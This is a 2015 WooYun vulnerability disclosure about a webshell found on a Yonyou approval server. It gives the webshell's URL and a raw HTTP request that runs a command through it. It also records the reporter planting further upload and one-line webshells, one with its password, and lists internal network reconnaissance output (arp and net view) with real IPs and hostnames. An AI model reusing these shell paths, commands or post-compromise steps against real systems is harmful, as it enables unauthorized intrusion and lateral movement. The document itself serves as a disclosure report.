当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147102

漏洞标题:用友某站点发现小马一枚已Shell影响内网大量主机安全

相关厂商:用友软件

漏洞作者: 路人甲

提交时间:2015-10-16 10:01

修复时间:2015-10-21 10:02

公开时间:2015-10-21 10:02

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-16: 细节已通知厂商并且等待厂商处理中
2015-10-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

已shell可威胁内网

详细说明:

http://shenpi.yonyou.com

QQ截图20151016084649.jpg


小马地址:

http://shenpi.yonyou.com/jbossass/jbossass.jsp


QQ截图20151016091002.jpg


该小马的用法

GET http://shenpi.yonyou.com/jbossass/jbossass.jsp?ppp=whoami HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: jexboss
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: shenpi.yonyou.com
Pragma: no-cache
Cookie: JSESSIONID=EBC96181BA0709FA6A30DC02674028E5


QQ截图20151016091212.jpg

漏洞证明:

QQ截图20151015134651.jpg


QQ截图20151015134701.jpg


利用该命令马
先传个上传马http://shenpi.yonyou.com/download/wpp.jsp
再传个一句话http://shenpi.yonyou.com/download/wpp1.jspx
密码:woo0yun

QQ截图20151016091510.jpg


进服务器

QQ截图20151016091530.jpg


QQ截图20151016091746.jpg


QQ截图20151016091924.jpg


C:\YONYOUMA\NCMA\UFIDA_NCMA_SERVER\server\default\.\deploy\download.war\> arp -a
接口: 10.10.5.170 --- 0xb
  Internet 地址         物理地址              类型
  10.10.5.1             3c-e5-a6-b0-e7-57     动态        
  10.10.5.47            00-50-56-83-3e-08     动态        
  10.10.5.53            00-50-56-83-00-20     动态        
  10.10.5.67            00-50-56-83-00-2b     动态        
  10.10.5.69            00-50-56-83-00-2d     动态        
  10.10.5.80            00-50-56-83-00-32     动态        
  10.10.5.103           00-50-56-83-00-3a     动态        
  10.10.5.126           00-50-56-83-5e-37     动态        
  10.10.5.150           90-b1-1c-3f-e0-f0     动态        
  10.10.5.171           00-50-56-83-7e-d5     动态        
  10.10.5.173           00-50-56-83-7e-d7     动态        
  10.10.5.181           00-50-56-83-54-2c     动态        
  10.10.5.182           00-50-56-83-54-2d     动态        
  10.10.5.183           00-50-56-83-54-2e     动态        
  10.10.5.184           00-50-56-83-0c-f2     动态        
  10.10.5.185           00-50-56-83-54-30     动态        
  10.10.5.210           00-50-56-83-00-0a     动态        
  10.10.5.229           00-50-56-83-6d-ed     动态        
  10.10.5.231           00-50-56-83-75-4e     动态        
  10.10.5.237           00-50-56-83-4e-ef     动态        
  10.10.5.252           00-50-56-83-0c-33     动态        
  10.10.5.255           ff-ff-ff-ff-ff-ff     静态        
  224.0.0.22            01-00-5e-00-00-16     静态        
  224.0.0.252           01-00-5e-00-00-fc     静态        
  238.0.0.1             01-00-5e-00-00-01     静态        
  238.0.0.252           01-00-5e-00-00-fc     静态        
C:\YONYOUMA\NCMA\UFIDA_NCMA_SERVER\server\default\deploy\download.war\> net view
服务器名称            注解
-------------------------------------------------------------------------------
\\10-10-5-210-ORA      10-10-5-210-ora                                         
\\BANK71                                                                       
\\BPM                                                                          
\\GBU_KHFWZX_10_2                                                              
\\GZW02                                                                        
\\GZW03                                                                        
\\JTCW_2012_57                                                                 
\\MERP-11-6                                                                    
\\MERP-2011-01                                                                 
\\ORDERTEST-02                                                                 
\\RUM                                                                          
\\U8ZCFTPNEW           u8zcftpnew                                              
\\UF03SERVER                                                                   
\\UFBANK18-C7DE7C                                                              
\\UFBANK183                                                                    
\\UFBANK201105                                                                 
\\US2008R2                                                                     
\\WIN-0SEOVGEM7PS                                                              
\\WIN-1T04B4N6LCR                                                              
\\WIN-2L4DKCPKEJK                                                              
\\WIN-3ULFN1SM94G                                                              
\\WIN-40NAHFQUNK0                                                              
\\WIN-43L7BI4HQAH                                                              
\\WIN-50569VGC3I0                                                              
\\WIN-52VNJC0PPJ3                                                              
\\WIN-9MDUC25IH1B                                                              
\\WIN-C11NMEK2NJF                                                              
\\WIN-C2Q2BHLQGAB                                                              
\\WIN-EIJN1GV4PP0                                                              
\\WIN-HQOGR4VHK2E                                                              
\\WIN-HRKR1J13R9Q                                                              
\\WIN-IEFRG0HT352                                                              
\\WIN-NPCNBIFHIHS                                                              
\\WIN-PINENM2P32O                                                              
\\WIN-Q2B6RUDSSBR                                                              
\\YCXFWZX-2011-01                                                              
\\YONYOU-0FAFBA45                                                              
\\YYWECHATSERVER       yywechatserver                                          
命令成功完成。


admin权限可内网喲

QQ截图20151016092033.jpg

修复方案:

#删除shell

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-21 10:02

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无